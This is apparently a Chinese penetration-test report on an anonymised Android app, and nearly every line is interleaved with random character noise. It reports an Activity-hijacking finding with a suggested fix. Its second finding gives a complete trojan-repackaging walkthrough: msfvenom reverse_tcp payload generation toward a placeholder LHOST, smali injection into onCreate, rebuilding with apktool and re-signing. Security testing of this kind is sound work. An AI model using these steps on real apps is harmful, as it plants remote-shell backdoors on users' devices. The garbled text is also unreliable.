l7 w9 c1 b, m1 w5 X { r0 z: S, m1 ]/ a7 Z) F$ ~4 K
( o; E# J( P4 W) i; h8 u {0 |. q$ a/ z5 J# @! }' ]1 d

% t0 Z" l( r! e& r! j( x# c: F+ |( f 7 ~) ^ t" m7 }! ? E& T' I 文档编号： / e! y7 [! f8 l/ ^$ w' p9 } 7 e" D- z4 A( i4 z

* j. @% ?$ v: A) ^' ]) n r( L. G% R9 U2 s3 U6 O% s8 S / |5 z7 i" R9 ~1 R, q* R8 L! b. m6 m! b4 i( f

: R! F$ s# F- A% L- r; g+ r % Y' j! m4 b" J7 u* P) E) V! n 3 l! R% O0 l, Y4 X3 e! D& g& o ' r$ R! s9 ?7 i! J/ Y. z0 {. }' R# g

; k0 d5 E, y7 F( B . X+ O+ V$ b8 e( w M" Y ) ^7 \( U7 f) A: S& {; K% | + [/ Z! p; T$ }+ A

% m) n" H5 W+ r" n* [ + o) o8 \) o: ]/ D, U# k& { * O3 r2 I5 Y" E5 x: g& w1 i* | , e. `1 \. Y9 y

. g- X/ q' X; d+ ~( X9 s; e0 j/ f9 a/ n& e . C$ i$ I; L" i6 G3 e) W * h c0 H; ^3 f+ k0 L1 b

* i* U! ]. c0 H* g) U; r * G& ^" a6 a/ N- a& [ ?/ _ 某某某APP渗透测试 $ p1 [ Y* C# a9 S' M9 x0 P5 h- n y/ e1 D ! ^! I5 ^. j6 c& |

- T; M; ]0 k' T- i' p0 T* J/ c4 n ~/ B7 I! N ; b+ [: {5 Z6 Q2 o0 O ) N3 H& e) j' [1 o! y( x* Q$ {

5 {; u: K8 s2 E- G3 M ) R& C& b1 o1 L* c* Q! u& F ( ?5 D# V. p" }1 Q$ }( n0 s" X * ]3 C/ |+ p8 S; S; s; X

7 B' x1 w) [8 ], n, ^2 O! ~ 7 g, h$ J/ U8 w0 c , D9 J; e8 t5 a T) I ( l" n- v6 W$ a

+ j8 l d/ |, J" s9 M0 s: U/ M- N0 i& |: U6 \: B8 y% R 9 K8 s1 {" Z3 l: U4 y3 I8 _9 k: T; o) z& o9 v

% c. h2 T8 _2 P2 M9 y % p! j" R- q3 f" O# }+ W 技术报告 / r! N7 r+ N) n" ~ : \) p1 g0 Z, X( A

& _' l( ]$ Y3 Q+ A n ; j1 w( H& |5 k* E$ J3 h; R! O - \3 L n* x; A' G2 J9 d* v - b. W, x6 k5 b/ X1 ^) X" ]# O

6 L9 c: x& B4 s4 ^ O; o 8 X+ S6 B: R& v( b3 D' j ( B5 W4 B& ~- L. V" F# }% \: e$ ~

\& H ?$ T- l% ]% S/ D( l 8 Q6 {" o" B# O$ G* a' G l7 Y G* Z0 F; W& O: M+ I; v6 n; U! O/ g$ W& V

3 r& a0 \; r8 f6 P2 }5 A ' s% K6 f, g: t N% _: p- ~; Z 0 W4 r) j6 U7 _ 4 w+ Z& ?; z" I8 H U/ q: O

1 O; ]% @* E+ @0 ?" G7 @ - V4 U! r; Y& E- ^( s8 w% c ; X- i2 C* F4 _. s% z / ]) z4 O V8 z# T$ b

7 s) C2 f9 n6 j% R- `" z2 B. W, j7 F1 e3 \7 C9 R/ u$ b1 ], ?5 N8 m % z0 s' D! ?# v2 }5 a5 D $ f0 b) N" Z/ {. I

6 V6 h6 }2 ~& `2 b0 K" A: z. M% Q6 K3 d3 d) D' m- i7 s : ~% f/ O, y' S0 m' j1 }# H 6 x1 [" E) T j n

; D* x' a% d+ v3 | ' Z2 a' o1 n% T- J7 T; D' m" P * E7 k1 F4 \+ S/ Z $ s& q3 t: B/ Y# [7 o; C) `

8 |6 ^2 B% F$ [$ } J " l" `$ L1 n; C s6 Q - ~ l& {* s1 ^# a , y) ]8 C, k9 J; F9 L

7 P0 w+ L! v9 s ~( n. F3 E 8 [( m7 Z" z; ?( W7 d5 Z $ f- y; y$ a0 |( y9 H, q1 w5 W / }6 B5 e/ J n, }7 O

0 i+ I5 k; f3 v0 }# W' w8 M T L; V + t6 @& i2 Y( d+ e ' W8 ^$ b9 E" m/ M6 c& Q

* Y3 \# V+ o( d7 ^- l( r' a: l. O K# W1 c& I5 V# _7 X6 ^ 3 S+ N5 W% \/ ?2 n; W; |- W8 ]! p' R. b. ~. V) T8 `

1 J& u' y$ \; x6 o9 m& p6 P D + `; n; l# L) l; ?! ? , ~' w' o* y9 K0 s. q/ r+ @* J9 i" `; Q! p$ X8 u2 i) ^0 c

& ^( K+ q% @* ~& m8 Q8 y* ?8 o' b% ^4 H4 u1 Z6 U* q- ]& Q0 } ! }( c, v$ d, g$ j! } . a/ r& S" d& Y( x

/ T3 B/ n# F$ }' y0 Y7 x" f 8 l8 P& _2 G/ q u1 }' W& B 4 O/ H+ g$ y% j- u& Z6 W# |5 P4 }' k. C, P2 J: i; t" h0 _/ }

, @& @- e* \# @ ; N4 V, L! [+ [( W# Q : f+ }) V! H8 A 6 O) P) F6 H1 o8 x. u

' h2 H4 W! g, H& C% q. }5 e . N" Y" t% c( y) ]: V ; ^! j' { e# [$ _/ X7 n3 c- l8 v) J # I- q5 E9 g9 Z, k' \

' f" N3 a" [- K/ y/ ]. b4 z 4 |9 | l, i! ^6 V; F* X 2 p$ X( g4 H& M. @' c # g7 c1 p. k6 R, \( U0 t0 Q

* z4 z, T( H8 A8 X# a) }4 {9 H ) y+ Z/ L: X/ \ 二〇二〇年 # d f5 U# i( }+ Q3 \ 2 Y) {$ `7 r+ z( U$ `5 x

F5 b8 F2 x* l) t" t9 _ - k: u) a: C! H- y. m/ S( v 目录 + E8 z9 Q& p* L: \8 P0 c9 f0 @) G. [* v

2 q' x% a/ w' v9 H( P! K 6 @: V5 N+ b8 E# ~& W# | $ t! B, g; _; Q$ y( y/ w 6 Y7 o Z# ~0 g, V z9 }1 |

6 e6 W6 f, L0 ]) j + ?; ^' x" _' {6 e" @5 q 1 概述... 3 % ~5 b- M+ K, ^# l v+ d- p5 C* `2 g

, t' ?* l) g# v. M / w% X) c: q4 ~5 [3 d$ r- u1 v, N 1.2测试时间... 3 + T* ^5 A! U! B8 W/ k ) q3 Y3 }# `0 ]' _3 w$ Y/ ?

" X; F4 H! C1 ^ 6 P/ J* m* Z/ @1 `3 | 1.3测试对象... 3 / q! K2 L5 V. k) w2 z & f" Y% L) ^2 z* E, I& C1 C h

0 `6 l& D) x! G# J1 D: h7 I8 b. P0 g2 J; E 1.4测试结果... 3 # d, s) o& q" H; `) z' g1 \$ t8 ]# w/ J1 G' m F( g

% _6 S O* L; B+ J% v0 e 7 k( _+ Y2 @% m- v- L; U' G+ Y 2 检测结果... 4 $ r# S& W' T) e: p4 ^ @0 f: w & o( g/ k6 k3 F2 [3 M: M4 r

# S9 Q! M& C! D; w4 D4 X8 y 9 b" n) A- i/ X- z 2.1 某某某... 4 8 r( F: \' ?/ d " F5 Q n! B, f

1 [) @. b9 U/ S, u% R . {* P9 X: P7 `0 S 2.1.1检测目标... 4 + a! M$ N: r' N& O" V2 h% n& ? , y0 M4 D. o& s

* I# m( [/ b/ a/ U2 c / W \( X% {2 E" {* H( ~ 2.1.2检测结果... 4 / l$ [) a% |1 p, l, s' x1 C 7 @. u, r9 W3 _# l- h/ [; u

1 z* }* D- Y R4 T4 r5 W q ( X1 g, f* e2 r4 M) b 2.1.2.1. 4 7 O7 y. _5 e& A8 s # L. O5 ~5 d3 Q0 J) e7 O

+ A! i5 v6 g1 w1 i s! f6 {& U& U X 2.1.2.2. 6 7 u* }7 E, b b8 |8 O7 X 3 k' y: G3 c) G: }; k

/ J8 Y- P) [8 C% r% A% | 8 G4 \$ U# _4 j' @ / ^3 z% [: z6 [1 T6 u. v 3 E$ p# Q; `; z+ W( A

/ I: u& u; {1 ~7 ~* s0 C! j + ~$ [3 [9 y0 F% `7 T* O+ H 1 概述 2 \9 @ I% w8 C7 _- H4 {% e! Q* s# p- q

0 n8 F4 F5 F) ]! k1 C H9 c4 Q5 h . g1 r; S. F+ L* Z/ z 1.2测试时间 9 f9 }2 \# {- h% k) n- O* d* B" ]2 [5 ^# Z: }' C

- s0 w I) M( p) a3 D9 R! ~$ }1 K 4 i! a! y. M. o" k V/ _ j7 K' b. d0 V4 _$ `; \| 8 ~$ \: _* e" V, I1 I- l4 M5 @. D 渗透测试时间 " S0 J) d8 R& K, K3 R: {; R% q- P7 u) O ~3 ~5 ^; k1 \| 2 [( N3 Y$ J, Q 4 J$ X& _" F: E3 l% r
1 W7 a8 T: Z1 t# t, \# R+ d+ K- W8 I$ \4 t3 @0 V) w: \|1 U5 v ' I) N0 L2 F0 y) I4 G! H r 9 X, @, E# L* \- Y' c 起始时间 ! A: S/ C' g) P2 V1 _' v; w! q. I1 A9 K% c - L: ~6 d! p( h$ R 5 S0 E4 C2 V6 J8 \|" A2 Z q	7 u$ K* \2 u6 H) [" j% j* G4 k! d8 k1 }1 E / T6 l/ x" `' x # B! M0 Q8 \|- E- \& D 2020年4月6日 9 W% X" [( N1 h- X# o + ]9 B9 m8 U: t3 k' r4 o3 t) W- c . s/ n6 Q6 ^$ X. f( ]$ u2 `% [ F$ _9 [
" [* y3 j0 r0 ?5 M+ S! K( }- ~ 8 d: F& j4 n0 m& a/ s: A4 ~ ' Q, `- v% T9 n1 Z" B 4 E) R+ Y2 \- x9 @$ n 结束时间 ( h0 q9 q: x& z( V 3 q; A0 y$ f- G 7 J& d! F3 l1 r4 e 7 ~/ i- v# N7 O; H" `; Q7 O* C4 k3 g	0 V% H( G) N/ U+ `0 @* [5 k# u. c 8 ?! i2 U ?; d. W / j3 V1 z+ X0 `/ @ * U: g3 r# @1 \) a* b) {: ~0 b 2020年4月9日 5 b- {' a3 x! S# O, S : Z: g. ^+ P( ~( N9 k4 q / L; Z" B1 b6 G9 F `2 p/ ]: k4 H, h

0 D3 a; z: j: ~) w# s4 C7 v * u6 o$ o! c1 \( F# S 1.3测试对象 4 s) W* N! l. ~* ~* c5 x( D- a+ y- h' v: N; J& n2 `. ?2 C

' y7 o1 o# U/ s 2 x, W* R" Y) I; w# f 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： 6 B; i) @; k" p5 S6 y' M1 ^3 M( g1 e# T+ G8 K% F. L) M

. w8 i7 \& q$ i 3 d- }" R% b2 h6 c4 V+ m 表1-1 检测对象 0 o7 L8 L. x' r3 n ) n( g3 V, _9 W+ \4 W

A5 t' t) o r4 z$ y! q5 b0 e7 N 3 Q, h9 F1 ^3 n: }! T+ V 6 b# q3 N2 r9 W7 D 9 l7 A- R6 K, G) T1 o- c 序号 " e2 f' r I8 e& B4 I r / ^: {) k7 P! O7 k5 n6 m + V# Q5 J0 s6 y/ T0 { n3 `; x6 C e! }- Q( R, ~	6 _* X/ M6 G+ J6 J - ]0 y% Q/ V; w5 X+ N: F2 w 7 d& K5 J% B9 w* c6 p $ b8 E, Y# O1 I! Q5 p 测试对象 / \|0 q' V1 ?/ H% R: n( a " q7 A9 O5 G- A: f/ ~# J6 K7 E, U ) W+ w. C' i% {: c- v2 t, Y! D- K+ q# d	! _5 {, ], M3 z 3 L3 k/ M* k& t) i" _ 0 g3 a+ K) {3 s! y$ l; o5 { 0 E+ X+ i. w. s. T' ]) c7 F 测试地址 6 h0 x, F8 p$ F4 ~8 C' O% q5 t; ?% X . `3 o( o9 `# P2 {) K . i$ s% E( y3 z& g	/ Y4 [& E1 v5 A3 j( _2 G , U8 D4 h* k! I- K5 C - w! f$ p5 N* l 6 D% m: O! `! p$ O, g0 a 安全漏洞 * M8 Y, F6 b+ g3 w 1 h: {( n! v' f$ X( { 0 v/ p$ M; b9 E' M: }' O" a" `- X, R; p
( U6 b5 _2 y7 x2 b0 O$ o 7 \|% \|6 h5 P- B4 e+ _% e8 m M) ^. E- i/ G" N7 }. u " n: \- F5 C1 D 1 * B1 R [( T3 ~ " b, \. N5 U% S6 T: ~5 C" z4 j 9 a3 o7 M5 c, Y1 @1 ~ 5 f- I, \|: m/ r# z	m4 B t/ A0 S " j. e `7 T% Z0 G; E% D 2 X8 @# ~. j' l9 V : q9 Y; \8 e& e- v4 A4 {- C 某某某安卓APP % D! ]! E9 J' r/ v; T! G0 `1 p$ B / z% }4 d) o3 G9 l# K; Y1 D, B& r# Z Z* Z	; p! R, m4 o2 I- [, X4 v$ E% B3 \ 4 U8 ]" ^' n3 @# e( }, X! R* @ 8 E3 D/ {7 }# \|6 f c 1 z* B# y3 i) l2 \: c* C/ ]( I , ^. h4 c8 z7 G/ f- o9 \ ' \9 \|2 y' _& X! T( W% k : y- J$ j2 j! W- E& J7 } 7 n8 ~4 o7 \- W4 g	* \! M0 B( D- A( b+ r3 } : [$ ?$ t8 {( j/ d1 B% \|( b/ p * n! x9 V# ]- e# t/ F ? + N& I3 x; i9 c& z# i, P I0 W 2 5 M- w) L2 m8 ]$ w, s5 i 4 n( W# C* K* p7 D5 f& j, M / y. _. ^9 ~& y* n. G- Z* [! a$ d 4 {, m/ M/ P, A! f* t# z, c d1 P

- j8 K+ m1 n+ L1 q # Q) T) y, A4 x 1.4测试结果 3 A2 E/ T; U8 `% I$ w' R4 Y$ V 5 g0 A7 D: n4 H1 e5 G* K' t

3 r# B& u2 O6 M3 g: i; y/ k6 w ' i7 N6 R4 m" }4 V& M 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： ' h6 z+ l( [ B1 T) D% P$ Q# z 8 M% M! d- s! @ ^9 E

3 j! I% p7 P# W# f$ K% B , V4 J6 Y" |5 ^2 m 9 h( T1 I" w& N" j2 ^ & U! J+ B4 X4 w7 X! A

' ^. _9 ^7 x1 y+ G1 o# p 3 Y2 j O- C8 L+ v. Z 序号 W: N0 `* J7 V5 ~2 r. k. t4 c9 ^1 c" l+ H2 }# H$ T9 t

- V# H9 E+ q8 p , h* R( n+ [- t 系统名称 ; p3 T" I' v/ z 2 o0 _4 i" e" L0 d4 {$ Q" f

! u( i# _6 L, v1 b 3 p; q( u( k3 o, n t) e) X1 G 漏洞名称 Y( }% s4 U5 {* ? 8 }! N6 |, H! p4 ] D6 x

( Z3 W; [# Q6 L, X: g9 B3 O4 \5 j6 Y j# [ 漏洞危害 ) F0 _8 i: J8 w9 j, y) n. p" O7 B$ ^5 \* i8 q! E

5 z* o# u( I6 p8 A% x; P3 F/ X6 m6 O7 H2 ] 修复结果 7 R Y" `3 q* ^0 G 1 |' h( ~: n$ @

3 z7 l7 c7 i, q. \) B# Y- P0 | 5 t% L* E) z( c4 J' n. d! K 1 . ]6 U- J2 _# a* U, D 9 I1 v/ t* z7 q8 r" c- B9 H

; `$ G- |, e" s ( A# @- W/ o0 w3 A. U6 t/ m 某某某某某某APP 5 G8 R5 @5 o! m% { v 6 b; k8 H3 d; y9 U6 M

) Y( i- ^5 }0 D( g 8 m5 C* a8 X; f: h6 q' i9 Y Activity 劫持 * {6 c6 b% Z) I& E : D5 v( l9 c& D7 r% N4 Y

3 J3 r! s" r3 i. W! S ! i @; F! r0 }* M3 ?; y4 s' H7 C r |0 S: H/ s; n- @7 }% W0 d2 Q) _% g0 a% t i! ^' g

6 w8 j# D2 i7 n _) J5 R6 E5 ~& x4 M9 Z. Q0 p( z0 ^; ]9 Z 高 6 n6 n" ?0 z, m( }' e2 S " p7 Y* T2 { |/ r6 ~, E# y

( W7 v! G& P$ g, z# J' X; [ ; l, g+ z9 R, q+ U8 r4 L, {3 Q + l4 h$ V1 b$ `5 O( G N; C( I) S7 j- ]1 m( h4 ]

$ {4 Q; N# Z! h- w 5 Q; K( @! z/ Y7 M0 Q. y" }" |0 w 2 3 \! _1 Z! m. a v4 J2 P$ L 0 w+ `, K" {, q# A- z5 g

) Q3 s/ M6 n2 h3 H$ p. d4 E Q 4 S# l" e3 i" U* f* ^ 某某某某某某APP # a; A8 Z6 C. T2 D2 C7 W d7 i" H3 W6 f' y0 W! w, o

/ r+ m3 G% m, k, @' N3 o7 E. o7 } 6 E$ I- ? t; c2 J! ]& r 反编译二次打包捆绑木马、篡改APP代码 : |/ t/ r2 z! y 7 Q$ I" H0 a& |; E) H- }) s7 |

; A, D' v# Y1 n% J9 E9 B, j: U. x( M% W 高 ! {3 L/ L" m: ^9 K ' X" e' N2 u. G0 M9 k, e' ?

; z9 i' G' s1 ^+ \3 q( Y . J) P2 G+ w6 Z9 K7 Y) u. S 7 F- c3 Y( x: ]4 g : L# {+ L0 X5 W. l, {% a! t" t8 ?

8 u3 j7 K% f1 F7 P! Z" v4 F$ H: ~; a/ B2 l& j5 M8 d , b. ]2 k0 C% V# E; I5 g/ p! m9 i( m

9 h# p* ?' T3 |# g! y2 Q 0 g W. f& o& U, X 表1-2 测试结果 ( \' v% O/ x! F( F5 ^0 t 6 r4 B! L' `9 `! {" u

" B* _! ?* N! S# D; s/ A( v7 i+ @' K S7 ?9 W$ J# | L * b. f% B4 M# f, }# M2 E2 _1 P $ i: w5 P* }+ ?6 [, t0 E& u5 n U

* F5 h8 |6 {( s6 x0 d : E/ b, D* T2 ]# G# H2 n: G 2 检测结果 & Q. V% R- T/ K7 A% w , \5 S9 {% A( [: W

8 V. e; Y% {7 Z% ? & B( B7 X+ N2 q$ G 2.1 某某某 - S9 ~8 y* w1 \+ R! H8 u& @) f% k' G1 m. r3 e

& O0 Q r! ]4 T2 s + Z% p& M; P$ [* r( x9 _/ M- w9 o 2.1.1检测目标 r# X9 ~, d5 n5 S4 f8 _ ! W, j M2 Y) o t0 T$ l( ?

9 `' W3 k9 N% i; U, J) G1 }8 v% F 8 G) i5 v0 b. r0 a7 i! b1 \ 目标地址： 某某某某某某APP - `) E/ f4 V) o* h }* p2 d- w; q : l9 L [- ~( J8 Q3 f4 o

# }& l, r+ O+ Z6 q9 f% v ( s/ r- i! H) E3 D. Q& z) d; d" o N 2.1.2检测结果 8 D( @5 X$ n+ \( J2 l/ o0 C; `* x" k \: d' r4 l% m

1 E. M: T7 h) m# C& C/ p , Y/ Z) N' z( j( ]+ J8 O 2.1.2.1 # C; a- G5 z8 W- p9 k% s6 y; b- y6 T# H

2 d( F- N/ _" Y, ~7 @# |8 A 0 M' ~' ^6 B4 F/ W3 l$ v( ?8 o( k8 S 漏洞链接地址：某某某某某某APP 8 I- h: m9 B4 s, O* {$ z . K/ \1 ]' R; T! c# ~/ q2 L" o

% \" H5 u3 Z0 p& F9 f2 [ - z5 G* Z8 a, a' q- I5 C, b " Q% _1 P5 l+ Y# H8 G 4 i# f8 S" k, i8 w

! H/ n4 p" X7 p! ] 1 R4 O& d; \% ~9 O" J 漏洞分析及取证： ' `3 ?( T9 d* p. I3 h O9 a5 }( Z ( ~' }4 ?/ p' w+ _6 t

. P7 T) M# N8 d1 I5 i2 U* Y - Y! n- A( B5 o7 C7 Q( I" ~# X 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： # _( v( h/ D/ U+ r0 t5 M6 u0 z7 D3 z0 _( V

/ t# Z( x( R) u! p! ~* p U , w( {$ B& P3 c/ ]$ x# a: h - q( |$ V* x9 P- O2 Y9 r! v9 x1 h* s* L6 c, D

. [: D. m3 h1 d. l1 c 6 U' q, D* I, V, H9 z6 F9 H 5 v0 }) ?2 a( F, ?0 D3 h, r+ |4 T ' x& Q- C* t R! A! k2 v l9 h

6 N6 S6 f9 a& Z2 p3 y: l. x7 D * E5 u9 O; R. F9 }4 X' x/ {% G 8 o: U1 Z7 R8 A7 r: K9 i* f/ a1 r5 y1 I& U

' h# \: G+ T% e( l0 i" _0 q: X4 V. ` ' V6 B) [" H' h3 C( m- r n . S. `1 {! a: N- U 2 |* O: z$ v; m% q3 G" L

1 T+ a8 E$ ]9 O8 Y& G 0 z* {8 A0 s' r/ Z( F # f9 Q9 n% ^- v* H5 v9 l9 D$ E : L8 \5 `3 W- s

1 {( ?& h2 ^) I- T) d 7 l2 w5 U( e* e) m 漏洞危害：高 5 C: O# o9 i _$ b4 s 3 p- |0 a7 h9 a; o

0 f6 e! i* E; r 6 o- f8 a( ?* e T: e0 X' p + g) N" g/ L/ J6 T% ~ ( u n( R/ \+ Q- J6 \" { 严重程度 $ P5 A& y; t- m* ~. Z' \|" ] , t1 ` D0 W- _% {. z, s( y 9 i* ?9 B% o6 \| ) T( O5 F# }! P6 S	/ w3 D2 ~( ~1 J `! U& O$ e1 w+ v - X, N1 v5 h2 e: K# z ! X! p+ O- s5 }+ P- B( x 0 ^" i- x6 m9 t 高 # h( X" l0 I9 o! g5 Q5 T0 [# t( A) n0 S9 }7 E & t* \* X% C# r. W& W4 C. n$ V, T0 N& V: @" N9 ?	7 Z; X# W* b; s* r. y5 ]6 T7 ?1 d U' n 2 x* o. e4 ?3 N7 L. _9 U' _ 4 H6 u6 @8 Y. V' \, r# ^ ■ 4 r7 M( q" r7 Y3 z; h* u l# Q0 k* h- h0 I) p# } O" j* M0 D& i2 D) @* Z, R ' a$ A+ ?- r+ H) Y; z	, s; ]- C" {7 T8 w- \|" o8 Y 0 ^; I( ^: {& J5 A; z4 W 0 o. ]7 v+ P2 Z+ X" I% {* A: g1 g. R6 z' Q 中 ) E ~: h4 W8 r; e( p% J# R* R/ k: K. @" X1 x5 c + V o1 E, w% w3 t8 H, Q8 Q' d9 y# p9 ?8 ]	$ \|# O3 {5 A+ [8 J3 [: _; J `3 }$ x9 F2 K 2 C: P& z; f1 g4 b1 j 6 t2 }1 L+ @6 h F1 c7 G# j# s 2 \# R1 S+ R- j Y9 U) C# L$ U7 H3 B, g8 Q+ `$ w8 w# \| ; y% W6 p6 c4 A' h0 ?" m% t' \8 H% @( m& [* I3 g) }	9 F3 \) P. y/ O" ~ , u3 S9 f g/ v6 A 2 p+ n) X% n7 }0 r% U9 g. A' J$ l, k4 N+ r+ u F, M7 P 低 & s D* B' A- F" r X( R+ Z' T# D* r + P( k/ \7 P3 n' H% S/ x4 R7 u ( f( o8 i, c( T4 V+ C) k ( I( p1 ~; g$ ]. o; q5 d# Q. s	0 @% J" Z$ f( ]% x+ A: P1 U ( ~1 p6 H3 {& f4 E+ \3 l! d # [, l7 `( N1 i 9 Q- K" G+ R0 [# e3 [! Q 7 y3 A& L9 P+ A5 v6 o7 i4 G+ {7 F9 R$ \# j' ?0 U - q- Z7 W- d6 \|3 X6 p" X$ {, V' R $ [4 Z1 C0 A$ V

' o( ?! W- s; I7 b1 l w- Z* M, r; `% U! h6 Z * p: k( {# W* X, w7 I# W * K: O1 @7 D% V9 ]3 }# Q

6 ?0 o8 u6 a2 C+ O( w% g$ ^' i$ ? 1 {8 Q. f5 ?. o- n; A$ U. c 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 + e Q" ?$ _1 e 1 _* S$ @. K; R# k8 e& m

0 _# [" }' D0 e/ I$ E* f/ B; l" N! _7 z; i! t2 D% S& Q 4 ~" O' n4 n! d4 s4 L+ A, ]+ o 0 _4 r2 T& M$ J( l) g% ?2 I; }

5 T( o& t+ Z) O; o, U" ~& x, x% U# j% `) |9 X 5 T: g' O) f p7 @0 j ' L, d9 ], w/ `/ R. ^

1 @) Y7 p9 G; C3 a$ M 8 S6 c. [( c5 [1 e t6 o 2.1.2.2 ( F; A2 x+ U, z* Y% A0 u" l + K" }1 Q* [6 h0 G7 Y

, K0 {8 H! _2 w ! ~+ I6 t2 k4 f. M 漏洞链接地址：某某某某某某APP 3 ?3 g3 g R$ Z# l+ S) J9 B/ Q- `5 } ! i8 C' |. c/ R

' n5 E- w j6 G + l2 E4 i$ y: h7 W% n9 c% z( A: S+ S 漏洞分析及取证： 7 e! ?+ K6 c1 A4 h; ` $ ~ B) d7 V' \5 s3 ~) \2 i

7 S+ j& `$ l# ?/ Q9 R" E1 d* D$ Y9 c8 ?3 U. j8 i0 X; I 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： & c4 V. O, {: L/ \2 _: _7 u0 b5 o. ^+ @$ [$ |

1 L3 p0 g2 n+ M1 J! k, ?+ k; ?. j8 s1 b) w# I1 H: ?8 s 用Metasploit 生成木马 apk ) \9 Q6 ], M& t% C8 h 1 E0 p# z1 a, g A, P

0 |! x5 u" l& `( ]% R0 {# T 5 n! b+ {. _+ l; ^1 U: | msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk , q' Y5 Z, n$ p% l' b # ?' V+ d! c% j& E+ m6 v* M( O0 V R

" K3 g# [0 Q% a3 @( G $ w/ |' R4 R- f# Q 反编译目标apk和木马apk $ |4 h" v7 |9 j/ d; } 4 V; |& i" G- ]7 U& r" }) |1 F# `+ A

% y6 ~' c6 z" @+ x: Z. q2 [6 X0 S: W: g: h4 G7 g. { apktool d target.apk
# m/ Y3 E4 y* L- P9 }4 R3 o- ^0 ^! q/ { apktool d cockhorse.apk . b; l* ]' T6 V5 S3 r" ?7 F @' u( H2 Q/ P$ J& G5 ~

4 D: M H" k( \. s( d8 J1 @8 |/ @5 I5 h& g% { 木马 apk 注入目标 apk # K1 c5 `6 o% v0 H- D$ f " A7 k- b V& g! R+ ~& b+ e

+ }" H9 [2 }( Y- X; F/ T w& c' i ; ?4 r& y( m, p9 r3 O0 K8 c 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
! X) s: B& ?% d) M% W- a. t" a7 Q 6 N4 B4 Z5 E3 m0 |9 ? invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V % O3 e2 C. A% @5 c# P0 T8 l0 @( p' l( j

. G4 h& Q9 ~7 H/ N / n; C" C$ O, ^' W9 `# d9 r- d 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 0 V6 ^; X9 e6 M# t* y ! d6 I% L3 w6 v. p4 k% L

' I) h' t: f1 D) Y6 R - g- t. m0 ^- U; Z2 y7 c6 J 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 , Z, ]4 }, A" j" } q ' l0 Q n) W0 J0 f4 A3 j. y

3 T" Y$ {) |. b; F: o 0 j% r+ n) F3 V9 q3 O 回编译生成最终 apk 5 @# b. m' c/ H9 Y9 ]' p |! z+ F" W3 B8 q! k# Y+ k

0 p) @2 [+ S& Y7 {$ P 0 |3 A+ L" K( \- V, g 重新打包 ! L8 W) R6 g9 E6 z- [2 t5 `8 h$ ?: X; ^( `

% D A! N! Z6 ?. p% D5 @ : B! R$ Q! r5 T) u! ^ apktool b -o repackage.apk target_app_floder ! H! S4 }0 ^$ H* n) a7 h. p" T- p+ K8 Q8 s& n% z; n" k9 _

" T0 Q: e# S, N+ ~3 V& n! f* [5 b' J7 x, l i6 c 创建签名文件，有的话可忽略此步骤 " [' D: | q9 m8 M, F ! }/ T. f; f" M$ y

" H' Y4 v9 D" O* C d4 d7 I ! V- g' L1 d, K/ A keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ' T/ @* A7 Z# E5 q6 r/ @ 9 `% u' e+ m" v3 c) b; x

9 g5 F- |4 V* ] * w' d9 a x/ c( ~+ S 签名，以下任选其一 1 A8 v4 ]- ]7 F / a9 L; a! @) r" l4 O F2 {

+ Q) y- i* m* r 4 J! H# E9 m5 W% @( K: p8 C; Q7 Z jarsigner 方式 3 k1 [: M6 D3 @, \& C- r1 X/ V3 B( Y* T& g( }

1 P0 _+ V& u' m & |( m% Z, `2 C' x2 S5 q jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname " v! o8 v0 p; N( ^3 e/ k4 t* ] 1 D8 x9 T" q/ D8 j/ e( C6 b4 C- }

2 C- v5 X& m8 V1 p% h / ^, s) z* F# t, z/ a apksigner 方式 : [2 {! d& i' O9 n) Y; M ) a, d+ f S1 m) w. B2 s; c

! k1 K3 h7 N- }% B/ c9 L7 R6 b: _ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk . y4 P2 R& |% p" ~ / ~9 ]) V+ l1 a- T* l) d8 D

+ S7 @/ `7 V0 S7 {- W% } $ _& [4 K) a$ j |+ R 如需要禁用 v2签名 添加选项--v2-signing-enabled false $ o: t1 L3 n6 ^7 P5 l ! o) K& X: w1 [: g

% d- N6 ?* I) L$ W: C6 {: `9 T6 ]6 K' ]6 r) Z2 W 验证，以下任选其一 # U5 Q% c" t7 H F* I; P/ J q# h! b) }1 ?9 I

6 k' P2 \3 [$ n% U & u$ a: x0 {/ g7 g: } jarsigner方式 : G+ }7 V( _3 ?% }# {8 S) M " F$ M2 g$ i- P& C! t; [6 |" c/ W

2 H+ d; W( e* Y8 ~ 4 n! W3 Q2 Z, S4 D jarsigner -verify repackaged.apk ' I* z9 r5 ]; k( ]8 T # m J2 f2 ]! K6 x, K a5 ^

& |$ V9 |' m& M/ Q) B8 r4 K $ P- Z; o. Z/ t& F apksigner 方式 ( R% {+ |# I6 X9 Q0 o* A9 S2 V. K; N. P& N# g- L

6 B3 R: |! e4 e a0 e9 b5 N. V, f, }9 ^3 S/ m apksigner verify -v --print-certs repackaged.apk ; v& ?" N6 z" [' ?/ |( I- g" }" A9 O* o) c+ }' A2 R+ P# ?7 ~$ f

_' P/ O0 m) V2 F) ^ ! D0 C; l' X! `( `' f2 C! ~ keytool方式 7 S1 }# H$ J$ C( I 9 B9 H% _) i/ r3 R

' \! j& [* |" E: x - n0 ~8 T: V$ v% F' g$ \9 h keytool -printcert -jarfile repackaged.apk & H9 _; _ [3 |: U: V, w: Y3 R# B) B4 Y

